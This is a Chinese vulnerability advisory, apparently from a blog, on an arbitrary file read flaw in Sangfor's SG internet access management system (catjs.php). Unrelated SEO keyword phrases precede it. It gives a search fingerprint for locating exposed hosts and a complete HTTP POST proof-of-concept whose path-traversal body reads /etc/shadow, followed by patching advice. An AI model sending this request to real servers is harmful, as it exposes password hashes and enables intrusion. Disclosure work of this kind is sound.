北京织梦网站建设,wordpress怎么映射到外网访问,网站弹广告是什么样做的,手表网站错误怎么办深信服 SG上网优化管理系统 catjs.php 任意文件读取漏洞 一、漏洞描述二、漏洞影响三、网络测绘四、漏洞复现小龙POC检测: 五、 修复建议 免责声明#xff1a;请勿利用文章内的相关技术从事非法测试#xff0c;由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间… 深信服 SG上网优化管理系统 catjs.php 任意文件读取漏洞 一、漏洞描述二、漏洞影响三、网络测绘四、漏洞复现小龙POC检测: 五、 修复建议 免责声明请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 一、漏洞描述
深信服 SG上网优化管理系统 catjs.php 存在任意文件读取漏洞攻击者通过漏洞可以获取服务器上的敏感文件
二、漏洞影响
深信服 SG上网优化管理系统
三、网络测绘
title“SANGFOR上网优化管理”
四、漏洞复现
登陆页面 验证POC
POST /php/catjs.php[../../../../../../etc/shadow]burp发包验证:
POST /php/catjs.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Content-Type: application/x-www-form-urlencoded
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Content-Length: 32[../../../../../../etc/shadow]小龙POC检测: 说明一下由于监管强制要求POC要等护网后才能开放 小龙POC传送门: 小龙POC工具 五、 修复建议 关闭互联网访问权限将该接口设置权限认证仅允许内部访问 尽快打补丁
